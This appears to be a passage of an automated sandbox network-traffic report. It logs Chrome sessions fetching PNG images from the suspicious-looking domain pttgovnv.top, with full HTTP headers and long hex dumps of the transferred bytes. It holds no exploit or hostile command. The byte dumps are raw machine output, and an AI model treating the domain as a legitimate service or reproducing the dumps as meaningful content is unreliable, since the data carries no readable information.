          2024-09-01 22:25:25 UTC1369INData Raw: 57 3f 3e ba 69 42 fa db 45 09 70 27 9e ff 7d f7 9d ea 3a 6c 74 d4 c4 21 6d 12 4a 76 92 0c 4e f2 c0 75 0d 88 8b bc ea 2e a6 10 28 0f 17 bc 5c 72 85 7e 33 a5 69 b7 d7 e5 a0 09 04 1c 0f d2 ba 99 e1 28 85 00 e7 f3 07 06 96 7d b3 7c f2 ae f4 93 bb fd 8d 66 f8 87 3f 3f 5b 48 8a 7a c1 e8 05 b0 82 34 79 be ee a7 34 b4 3d 66 cc b7 bf 62 86 df fd 6a 7a cd b9 e2 8e bf 7e 26 2e ae c3 b6 47 4d 1c d2 96 74 1f b6 0d b3 1c 77 3d b6 cd 9a d4 c2 9d 1c 5c 1f 2a cb ef a7 75 93 c3 16 37 39 60 8d a5 51 0b 97 66 80 f3 f5 34 c8 8d ef f7 c5 77 8e c6 93 4b eb b9 ab d2 bc 39 aa 55 f3 6b d6 a4 09 37 c5 00 57 78 dd 07 ed a6 d4 a5 38 de 12 e2 b0 12 f4 ee c7 a4 c7 22 93 40 b0 b0 20 e7 fd 76 dd a4 f3 40 eb 65 b8 69 a3 61 52 1c 3b 8e 3d 02 eb c6 3b 1e 34 4d f2 8f dd f3 03 5c 16 7d b6 24
          Data Ascii: W?>iBEp'}:lt!mJvNu.(\r~3i(}|f??[Hz4y4=fbjz~&.GMtw=\*u79`Qf4wK9Uk7Wx8"@ v@eiaR;=;4M\}$
          2024-09-01 22:25:25 UTC1369INData Raw: 13 72 b3 83 f7 92 9d f3 ca 1a ad b3 2b b2 4c 4b 3e 90 67 dc 13 5a 52 c3 c4 1c e6 75 9b 4f 83 3e 99 60 8f c3 65 72 db c2 9c b5 70 04 b8 38 db f1 9b 7f 2d a8 ff db da 3d bc 9e 10 c7 c1 27 ce 01 65 a9 77 00 1d 5c f6 de 15 3f 11 49 bf a4 73 ba 2c 6b 47 b7 a1 a4 4e 4c ed 29 9f cd db cc be 97 f2 f3 33 97 51 5a 77 12 af fc 45 55 cc c7 6f c5 dd 8f 09 70 71 02 dc 6b 77 dd 1a 38 d9 96 b7 cd 1a 3e bc 9e 10 97 23 7a 77 e0 3c b5 54 47 ab b2 13 c8 b2 ea c1 6f d5 c2 9c 84 b7 6d 6f de ab 6b 58 fb e6 ae a3 ae 39 ee 58 3c 0f a9 85 0b ed d7 a2 e1 ab 35 e7 36 9f bb 01 85 b5 dc aa 66 3d bb 27 cc 13 e6 67 3e fe cd 51 0b 97 a7 00 57 1d fb bf 97 be 1e 7f 4a b7 78 87 fc d2 4f bb ef 4a ed 5b 97 4d 98 10 b7 0e 27 ce e6 1c 07 e6 c6 aa 0c 2e 1b 10 e6 ee d0 c0 b0 8c 27 a5 23 0d 9a e7
          Data Ascii: r+LK>gZRuO>`erp8-='ew\?Is,kGNL)3QZwEUopqkw8>#zw<TGomokX9X<56f='g>QWJxOJ[M'.'#
          2024-09-01 22:25:25 UTC1369INData Raw: b7 9f 81 73 51 75 79 c6 f9 bf a6 fb f7 c0 09 ff 3d 6b 7f 9d c5 76 40 e0 6e 4d d9 5e 02 8f 31 49 4e 03 e1 c1 3b 70 3d 7f e7 59 b7 19 f5 48 83 33 41 39 21 34 a7 2e bf 6a 02 d3 08 aa 49 99 56 b3 52 71 76 ca 2d 27 cc 6c cd 38 0f 32 ad ab 1a 50 26 2d 5f 65 42 6d 50 d7 3d 50 e8 bc 84 fd 6d d5 f9 6e 5d 4f 7c 9b 11 e6 f7 b2 9e 90 27 cd db f9 88 65 3f 4b b9 9b 19 02 9c d1 65 09 2a d7 a0 93 fe 56 c0 3a 99 d6 ac 51 8f b1 bd c9 ef f4 34 74 9f b9 38 d0 30 79 35 c2 7a 90 cf 1f 71 97 4d a7 5b 9e 73 7f 8a b3 2e a3 5c 70 cd 33 5f c5 80 6d b0 12 72 81 d5 0e d9 ae 6a 33 ee 93 97 cd d9 be 49 71 d6 f9 45 99 8e b3 3f d6 62 06 b8 b1 7d d7 9b 66 4b 2f ce 36 63 1e 63 fc 60 3a d7 34 30 51 e0 c5 86 13 e0 8c 61 48 11 42 5c 0e 75 f4 ea 25 2e a9 cd e8 27 3c 4f 95 90 da 17 fb 15 36 cf
          Data Ascii: sQuy=kv@nM^1IN;p=YH3A9!4.jIVRqv-'l82P&-_eBmP=Pmn]O|'e?Ke*V:Q4t80y5zqM[s.\p3_mrj3IqE?b}fK/6cc`:40QaHB\u%.'<O6
          2024-09-01 22:25:25 UTC1369INData Raw: ee 78 cd bb 49 db f4 20 e4 bd 41 cc 6d 67 27 24 14 36 e7 5c 86 7d dd b7 13 6f 82 d4 ed e8 9c 39 7b 43 4e d0 b1 43 96 b1 1f d0 45 42 a6 71 ef 3c d3 00 96 11 35 71 c8 c2 d4 11 fc 43 c8 5d 7a 17 9d 03 ac d4 24 55 e7 38 21 f4 b5 76 c2 7f 3c 57 55 5f 9b 21 07 74 e9 3b 33 e9 a9 06 fb 11 6a 15 36 32 28 df 5a c0 3c ba a1 cc ad c5 94 13 9b fd b4 8c b1 21 41 62 da 5d 50 78 9b b6 1e 06 26 dd 31 e2 e6 99 af b0 9a e9 b0 a7 0b 6c ea b2 34 12 9a bf c6 1c cd cc 47 33 84 37 bb 79 3d 4c 3f 68 b9 74 fa 35 ed c3 56 b5 f6 dd 8d 90 fd 56 b6 f5 52 c0 be 3f d7 34 00 42 1c d6 92 8c 87 65 f5 83 93 13 8c dd cc b8 a5 ef d5 67 0d 03 01 63 9c 6d d9 e3 66 cd 31 bf 03 0d 31 a3 c0 a1 bf 53 37 67 9b 73 37 f4 fd 56 c8 74 26 06 ca 18 8f 27 0b 72 10 50 f3 32 f1 19 a3 da 84 e6 06 80 4a 40 ed
          Data Ascii: xI Amg'$6\}o9{CNCEBq<5qC]z$U8!v<WU_!t;3j62(Z<!Ab]Px&1l4G37y=L?ht5VVR?4Begcmf11S7gs7Vt&'rP2J@
          2024-09-01 22:25:25 UTC1369INData Raw: be 9c 65 6f 4e d9 0f 8e 02 f6 81 8e 13 c6 e2 d4 24 75 67 5c e6 6b 21 fb 63 67 8e 50 d9 73 42 58 35 e2 31 4e e6 e5 cc 70 27 d6 be 7f 18 71 df af f2 c4 06 ac 44 e5 cc 70 38 a4 14 56 94 d6 66 f9 27 b8 d6 8c cf 3e 2c ea 41 ad e2 d4 30 74 f5 20 3c 71 08 8f 59 7f 5b 7f af ae bf d3 b6 c7 5e d2 69 35 f5 37 db 11 e6 bd a4 d3 aa e8 6f 77 ad cf ea fa 59 67 d2 70 26 d6 38 67 45 67 d9 65 99 bb 61 cb 6e 8d 5b 26 9f 37 a7 1d e8 ad e7 54 96 dc e5 4e 63 bd 5a f3 38 6a 0e 9d a5 89 4d cb b5 69 9c e7 c7 5a 03 23 77 a2 0c 11 a3 bf 5f d7 ed 28 b4 8c 9c 6d b0 a4 af be b5 0e ba 11 7e 67 e6 70 60 2d d7 cc 1d d9 a3 0c d7 11 77 be 74 f9 fd 31 f1 3a 11 9e 17 eb 6f 27 27 e5 ec 6c 6f ad 38 c3 8b c4 99 86 ee 77 35 5d 6f 2d 67 5a 33 df 2c 10 f6 9b d6 33 5b fd e9 fa 63 de f5 4d c4 67 1e
          Data Ascii: eoN$ug\k!cgPsBX51Np'qDp8Vf'>,A0t <qY[^i57owYgp&8gEgean[&7TNcZ8jMiZ#w_(m~gp`-wt1:o''lo8w5]o-gZ3,3[cMg


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          63192.168.2.449806104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC361OUTGET /help/layout/images/33.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC730INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Content-Type: image/png
          Content-Length: 11236
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"2be4-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36234
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fHr2QSuDWbALqFHUA5c97%2FtfRBubL%2FU6MUIMYr6qbWX3mYSTTkOK0mkMo%2FA5r08Be8%2BCJLa5UEEBAlVrHDf4BqoVgGUaIU%2BbXEZ4saJIqdtrUDQlqhkABEaq6%2FYg4hE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad154b107ca2-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC639INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2b 71 49 44 41 54 78 da ec dd 4d 56 1b d7 ba 06 e0 8a d7 e9 db 67 04 26 23 80 74 6f 07 79 04 26 ad 34 2d 8f c0 64 04 51 46 60 3c 02 cb cd db 0a 1e 81 e5 ce e9 1a 46 10 18 c1 35 23 f0 ad 0f b6 8e 65 02 48 55 7b 97 aa 4a 3c cf 5a 5a c9 39 01 51 bf bb de da bf 3f 7d fb f6 ad 02 00 60 5c 9e 38 04 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<+qIDATxMVg&#toy&4-dQF`<F5#eHU{J<ZZ9Q?}`\8BBB qqqqBBB
          2024-09-01 22:25:25 UTC1369INData Raw: 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00 80 10 37 54 df fe b3 7f 5a 7f f6 1c 09 00 a0 2f ff 72 08 5a 39 a9 3f 67 75 90 9b fd f4 3f e7 27 0e c7 78 fc f4 bf e7 cf ea 7f 4c eb cf a4 fe 3c db f2 9f bf 58 fd 7c fb 6d 7f b1 e5 7d 8f 7d 3e aa 3f 07 6b 7e f4
          Data Ascii: qqqBBB qqqBBB qqqBBB qqqBBBB7TZ/rZ9?gu?'xL<X|m}}>?k~
          2024-09-01 22:25:25 UTC1369INData Raw: a8 b6 3d ca 73 af 83 f3 34 ca 6e 2a 42 5c 77 41 ee 2c bd 79 2d c3 59 5c e4 67 b7 87 7f c7 cf c5 cc e6 f5 27 7e f6 e7 fa f3 7b a1 40 57 a5 37 cb f7 29 d0 cd d3 28 33 76 c3 db 42 d3 8f b0 65 05 3a d0 6f ea 79 a1 7b be 54 88 9b 0e f8 b4 94 38 4e 97 03 5b 86 eb f9 96 6a 3f 27 a3 bb 07 6f 26 30 bf 1a d1 4b 86 10 d7 53 90 bb 48 17 f8 87 f4 7f 45 4d d9 db 54 2b 37 b9 eb e7 53 b3 eb 6a a0 bb 2c b4 39 d7 35 74 a9 c9 f5 c4 48 d7 9d 30 77 08 46 a9 44 07 fa 6d 06 a7 45 a1 6d d9 1f 62 93 6a c1 a6 d4 d3 81 5e 6b bb f0 37 ba 70 7b 70 c4 2c ad e0 20 c4 f1 43 30 fb 9a 96 9e f9 75 25 f9 47 ad dc a7 54 3b b6 77 5f 00 4c 81 2e fe fb b2 c9 b5 c4 1c 34 f1 f0 88 3e 74 5f 52 98 d4 dc 3a 5e fb 69 c2 4a c6 65 9b 4d e1 2f 73 83 53 7a 19 2d d5 3a 30 c4 07 7e a9 6d 5a 0c 70 df 26 3b
          Data Ascii: =s4n*B\wA,y-Y\g'~{@W7)(3vBe:oy{T8N[j?'o&0KSHEMT+7Sj,95tH0wFDmEmbj^k7p{p, C0u%GT;w_L.4>t_R:^iJeM/sSz-:0~mZp&;
          2024-09-01 22:25:25 UTC1369INData Raw: a3 11 9f 93 92 61 76 5b 01 a8 e4 4b de d8 43 dc 90 47 13 0b 71 03 0c 72 11 96 5e 3f f0 46 10 eb a4 be 48 61 ea 43 7a db be eb 8d fb 6a e5 bf bd 2b 51 98 de 0a 73 6d 6b 0d a3 6a fc af 34 85 02 fd 3d 20 f7 07 b4 1f 7b b6 a3 d8 64 b2 a7 85 83 43 ee 00 87 8b aa cc 60 9c 5e 46 a9 16 6c 4a ed a3 e6 26 27 00 95 0c cd 47 3d ed 43 a9 17 e6 b3 3b ae e1 49 35 42 fa c4 6d 2f c8 45 1f b9 8b 54 08 af f6 07 78 99 1e 34 93 3e 07 0a a4 7e 6d d3 34 6f 5d 7c da 8c a4 6b dc 57 8f 41 be a5 52 4e ee 8b cd c7 d5 3e a7 f1 ef 69 99 be 57 99 db 94 3b a8 20 ee f1 52 cb 70 6d 7b 80 43 a9 65 b6 ce 46 56 3e 14 09 29 29 04 b7 ed 1e 10 4d d0 67 69 70 5f df e2 ba fb b4 f2 bf 67 d5 08 46 1a df a6 26 6e bb 41 69 91 02 db ed 37 80 b8 a2 2f 86 d0 b7 2c 6e b0 34 35 c9 9f 2d bf e2 bd 1a b9 ec
          Data Ascii: av[KCGqr^?FHaCzj+Qsmkj4= {dC`^FlJ&'G=C;I5Bm/ETx4>~m4o]|kWARN>iW; Rpm{CeFV>))Mgip_gF&nAi7/,n45-
          2024-09-01 22:25:25 UTC1369INData Raw: 01 ec 93 2a 7f 52 ca 49 ee 4d 1c a3 50 63 c4 6a f5 cf 9a c0 bd f4 fd 5f 6f 5d 38 07 0f dc 10 f1 b3 67 7d 55 51 a7 65 c4 a6 0d 0a 6e 73 c6 dd 7f 7d 9e 56 f9 4d 3d 02 f2 6e 84 b8 8f 4d ba 4a 14 5a 86 6b 39 c0 61 9e f1 1d f3 02 21 ae 93 1a fb 42 4d a9 e7 3d cf 0d 57 3a c4 c5 f9 9e 35 38 86 cf 32 cf ef e0 43 5c 2a 8b 67 0f dc 4b cb fd ff a3 fe d9 cb 74 cd 9f d4 81 ae d7 81 2e 3b 1b e2 5a f4 7b db 4a 08 49 e1 e7 2c 5d 00 fb 2b 85 68 5c e4 c7 69 95 83 b1 3c 90 9b 14 dc fb 15 b7 af d1 e3 54 68 3c 2d f0 75 42 5c cf d2 d4 0d 7d 84 f1 d3 2a bf 09 f7 38 33 c4 95 a8 11 5c 86 8b d2 d7 72 89 1a be 93 01 5e 72 39 c1 68 bf 61 ed eb 24 e3 6f 0d ae 3f dc 1d 65 f1 ac 61 56 78 9e 7e 3e 96 e8 3a ea 73 20 d7 4e 8e 4e 4d fd de ce 0a 06 b8 eb 93 96 39 87 d7 6a 90 3b 4b 37 c5 bb
          Data Ascii: *RIMPcj_o]8g}UQens}VM=nMJZk9a!BM=W:582C\*gKt.;Z{JI,]+h\i<Th<-uB\}*83\r^r9ha$o?eaVx~>:s NNM9j;K7
          2024-09-01 22:25:25 UTC1369INData Raw: dd 57 b3 93 6a 36 9a f6 8d f3 30 2d 5b a0 df ae d2 7f d3 e7 2c d8 03 13 35 c8 af ef 79 01 a1 3f 43 ed 38 3f 84 01 0e f3 2a 6f 35 81 eb 97 b9 36 4d aa 85 9a 52 c7 36 ea bb 78 88 4b c7 f1 69 4f db b4 f5 4a 87 96 15 33 d3 be 77 64 30 21 2e 1d c0 78 23 7d 53 e8 2b a3 8f d6 8b e8 f7 b6 e1 2c ca 4d 1f 90 fb a9 b9 97 f5 37 ec 26 c7 76 b2 a5 07 dc d8 c4 75 3c d1 84 3a 48 25 0a f0 e2 e7 b5 e0 a4 bb 63 ad 8d cb 3d 2f 57 29 84 3e 96 10 f7 f4 9e c0 9e 53 9b 39 e4 fe 70 55 ca 1a ff 78 4e 35 99 e6 2a 65 96 db 95 4d 9f 1f 5d 88 4b 6b 49 46 2a 7e 5f 15 5a 47 32 d5 5a 1c 34 e9 a8 98 1e 92 4d 4f c0 ac 62 9d 0f eb 6e e6 74 e3 1c de 13 94 1f 6b 8d 67 d4 62 fc 9e ae e3 33 97 d1 b0 14 1a d0 d0 65 93 5d 89 00 f5 32 73 a4 7b 89 20 74 b4 a5 df 29 7d ec b6 fb 1c bd 29 63 4b cf 17
          Data Ascii: Wj60-[,5y?C8?*o56MR6xKiOJ3wd0!.x#}S+,M7&vu<:H%c=/W)>S9pUxN5*eM]KkIF*~_ZG2Z4MObntkgb3e]2s{ t)})cK
          2024-09-01 22:25:25 UTC1369INData Raw: 61 31 35 e9 6d 11 39 93 be 0e 25 b8 1c f6 fc f7 8f 5c 46 ff bd 77 07 15 e2 aa 02 4d a9 3b 76 8e fa 0a 52 a3 eb 0f 97 82 5a 1c af fd 3b 32 c5 d1 ad 9f 9d dc 53 1e be ea 33 c8 3d 19 da 41 8d 0e 83 d5 4d 67 c2 36 de a7 d5 20 86 12 e4 de 76 19 2c c7 28 2d b7 b6 c9 83 e0 9d 49 70 8b f9 9a 79 ce 4a f5 f1 fc 3c c6 83 97 9a f0 5e b9 8c f2 02 53 aa ad bf cc fc fb 77 35 a9 3e e6 09 7e ef 3a ce 17 05 8e f3 98 c2 63 8e 79 75 ff 74 2a b7 af b3 87 02 ea ab be 9e f5 4f 86 78 54 a3 33 61 fd 8f 5f 5a 5e 88 7f a4 36 eb 67 1d 6d 5b d3 20 f7 5e 90 fb 47 81 b9 6e 72 df 18 8d aa 16 73 38 06 31 e2 7a dd c2 d4 43 0c 2e 3b 28 d6 32 9d 66 de ff b9 8e 56 02 76 6e 53 ea f9 0e cc 0d 37 94 40 35 aa 10 97 ca 93 fb 46 9b 9f 57 b7 6a 8e d3 64 fe f1 ec bf 1a d2 cb c0 93 a1 1e e0 95 7e 72
          Data Ascii: a15m9%\FwM;vRZ;2S3=AMg6 v,(-IpyJ<^Sw5>~:cyut*OxT3a_Z^6gm[ ^Gnrs81zC.;(2fVvnS7@5FWjd~r
          2024-09-01 22:25:25 UTC1369INData Raw: 73 c3 3d 70 9e bb ec 17 37 e6 17 f2 fb 6a 82 a3 ec 88 d6 b9 af 2b 2f 84 cb cf b7 ea 66 8a 9e bb 06 d5 5c f5 71 cf 3f d9 f5 8b f8 56 98 db b4 59 33 4e d0 fb 34 72 74 52 78 7b 4e eb 4f 3c 54 5e 37 bc b9 0e d3 c5 f3 7f a9 e9 b7 b7 40 97 6a de e2 06 b8 48 a1 f7 a1 5a 8b d8 c7 68 3e 3d 7e 68 16 6c b6 77 3f 54 65 fa c6 6d f2 02 32 7b e8 3e a8 ca d6 0a b6 da 8e 7f 6c d7 cd 4a 04 25 06 34 7c 1e 41 0d 45 a9 07 ce cb 8c 26 d5 6d 3f f4 4e 1f e1 6d bf 18 e9 77 77 5d 16 ce d7 94 41 4f 57 5e 08 97 9f 07 43 61 1f cf b8 27 8f e5 2a 4e 61 6e 5a dd 0c 80 78 57 6d d6 01 71 3f 25 f2 45 07 61 6e be 12 e6 9a 3e cc 5e ae 04 ba b3 d4 6c 74 d4 65 a8 4b c1 2d 82 63 dc b4 7f a7 5a 8e 75 4d 4e 71 9c 35 9f 0e cf b4 da 4e 07 dc 97 03 d9 8e 26 13 9e 96 ea 5b 37 1f fa 45 90 a6 3e 29 75
          Data Ascii: s=p7j+/f\q?VY3N4rtRx{NO<T^7@jHZh>=~hlw?Tem2{>lJ%4|AE&m?Nmww]AOW^Ca'*NanZxWmq?%Ean>^lteK-cZuMNq5N&[7E>)u
          2024-09-01 22:25:25 UTC1014INData Raw: 3d 6d c7 22 33 c8 5d 9f f7 a1 f5 9d ca 38 c6 c5 82 4b bd 0d 8b aa 7d 53 66 b1 5a b0 96 81 b6 48 98 2d 54 1e dd f5 b2 71 9e fa d1 0b 71 8f e0 c1 b8 97 02 5d 9c f0 65 3f bb b8 b9 ce 04 ba ce 8f fb ec 56 98 be cb 65 2a 6c 4f 4c 9b f2 8f e3 77 b0 f2 59 ae 12 b2 3c 96 e7 e9 b8 cd ba ac 69 ee 72 3b d2 83 f6 b4 c1 83 6e 50 4d 76 99 0f d6 a6 2f 3a 9d 34 6d b5 38 07 83 0f 70 19 c7 f8 75 c9 81 19 19 21 b9 f8 b9 ae b7 25 f6 6b d3 7e 90 e7 e9 bc f6 5e db 9d ca 9f bf ef dc a7 8c 2e 24 42 1c 40 b9 07 4c 84 fd 75 93 7f c6 e8 f0 a3 5d 5a 54 3d 85 8c f9 9a 87 7c 04 a5 59 bd df 27 1d 6f cb 72 02 d6 4d 6a ae 96 2b 65 1c 0f fd 7c a4 63 7c ba 66 bf ae d2 be cc 3b bc be ff d8 f0 b8 76 76 ae d3 44 cf eb a6 3f 19 dc 7d 76 4f f7 1c 35 71 00 03 7a d8 2e 3b 2e df 6e c2 89 02 fc b4
          Data Ascii: =m"3]8K}SfZH-Tqq]e?Ve*lOLwY<ir;nPMv/:4m8pu!%k~^.$B@Lu]ZT=|Y'orMj+e|c|f;vvD?}vO5qz.;.n


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          64192.168.2.449805172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC599OUTGET /help/layout/images/38.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC728INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Content-Type: image/png
          Content-Length: 11236
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"2be4-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36234
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yIFe%2Bk21aE%2Fe1R7q4D1K0nvfb1V6Yv08k0dCn8qQkJQwtoboSZOBp4t%2FjibAKnzGGgwzULAwRHwErBJlnkomLA%2BFPy3rEXIkcN5%2FfDNeiK77XfAnhzrcHW2eZCuvbUk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad154a4a434f-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC641INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2b 71 49 44 41 54 78 da ec dd cb 75 db d8 96 06 60 54 af 3b b7 3b 02 b3 22 90 ee b4 27 a2 23 b0 6a d4 43 d3 11 58 15 81 e9 08 4a 8e c0 f4 f0 8e 4a 8e a0 e8 49 4f 2d 47 50 74 04 d7 8a c0 8d 2d 6d 5c b3 54 7a 10 e4 01 08 92 df b7 16 96 ea 21 91 20 08 1c fc 38 cf 9f be 7f ff 5e 01 00 b0 5b 7e 12 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<+qIDATxu`T;;"'#jCXJJIO-GPt-m\Tz! 8^[~888!!!@@@888
          2024-09-01 22:25:25 UTC1369INData Raw: 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 80 5b 37 e6 7f 7d 19 d5 3f 62 7b 5a 6f c7 2d fe f4 5b bd 5d c6 3f 7c ff df a3 b9 23 29 c4 01 00 dd 85 b5 e3 a5 2d fe fd a8 f0 db 7c aa b7 45 86 bb 4b e1 4e 88 03 00 d6 0b 6d e3 a5 ed d9 96 76 25 82 5d 84 b9 b9 50 27 c4 01 00 f7 07 b7 d3 7a 9b 54 e5 6b d9 4a b8 ca 40 77 11 5b 1d ea be f9 d6 84 38 00 38 d4 e0 f6 34 43 db 50 83 db 43 81 2e c2 dc 4c 0d 9d 10 07 00 87 14 de a2 5f db 59 bd bd dc 83 8f f3 b5 de ce 33 d0 a9 9d 13 e2
          Data Ascii: 888!!!!@@@888!!!!@@@[7}?b{Zo-[]?|#)-|EKNmv%]P'zTkJ@w[884CPC.L_Y3
          2024-09-01 22:25:25 UTC1369INData Raw: f1 7e 9b 5e 8b 3f 0f bd 8f 9c 10 37 cc 20 17 d5 b8 9f 37 39 d1 ab 1f fd 96 84 bb dd 29 f0 f7 ed 62 2c 7e 53 c8 11 71 9f 0b bd 5c 27 21 a9 e0 f7 f8 b6 de bf a9 2b 63 67 af e7 d3 0c 70 bb b6 dc 54 f4 1b 3d ed e2 01 6c c3 5a b8 c6 2f f5 fd ec 62 85 f7 9a 54 9b b7 6c 7c a8 df 6b 32 e4 2f eb 1f 2e b5 01 5e fc ff f3 e5 b2 3e 01 5f 6d 70 02 3e cb ed 64 e9 84 8e 1f 51 73 77 59 fd 68 92 15 ec e8 52 dc bc 7e cb 9b 59 a9 9b c2 53 87 95 1d 08 70 cb fd 9b 77 cd c9 f5 83 ff bf be 74 d1 6f b4 44 8d 64 94 27 17 2b fe 5e 89 f7 1a 34 cb 6e 0d 37 c8 c5 13 dc ab c2 2f 1b 49 2e fa 12 c5 6c db 7f d4 c1 ee 7b f4 c1 8b 01 15 d1 77 20 9b 72 a1 ab 9b c2 b1 43 c1 9e 87 b7 a7 d9 2d e2 f5 8e 7f 94 78 00 fb 9c fd 74 8b c8 a6 d4 12 c6 85 7f ef c1 e3 90 2d 63 42 1c 83 09 72 77 05 bb 28
          Data Ascii: ~^?7 79)b,~Sq\'!+cgpT=lZ/bTl|k2/.^>_mp>dQswYhR~YSpwtoDd'+^4n7/I.l{w rC-xt-cBrw(
          2024-09-01 22:25:25 UTC1369INData Raw: f3 7b c2 e2 26 9a c1 19 33 13 07 0f 26 cc 9d e6 b9 54 9a b0 0e b0 ca 7d f7 fb f7 ef 8e c2 2e dd 3c ff ef ba d3 ec e7 15 7e b5 09 51 f3 fc 19 23 a7 a2 36 ef db d2 d2 5d b3 0c 47 f7 79 9b 23 5e d7 dd d7 78 8f f8 fb d2 fd e6 22 80 9e ed 5b 13 eb 4f ff fa 52 ec 62 ac 03 d6 4f 3d ee f7 a4 fe f1 be e4 f7 5b ef ff d3 7b de 2b 02 de 1f 85 de e7 4b 5e 13 ab 8a 6b e8 e2 b1 69 21 0a 7e 8f 0f 2d 78 7e 97 f8 dd 99 45 ca 19 e8 bd 2b ee 05 6f 0a bd dc f3 ec d2 73 df 7b 95 2c 27 36 ba 0f 0a 71 dc 75 82 96 ba 69 46 18 7a ac 5f d3 87 1c 99 ba c9 fe 76 15 e6 22 a8 9e ae da 8f 4f 88 eb 74 df 4b 16 d0 e1 e7 bb a6 60 28 1c e2 d6 f5 2e 9b 94 3b ff 1e d7 f4 21 67 e8 07 21 6e cf 43 9c e6 d4 5d bc d9 df d4 40 bd 2a f0 52 ab 74 4c 7f 99 83 1e 36 d9 df 45 06 c1 52 6b f8 35 a2 16 71
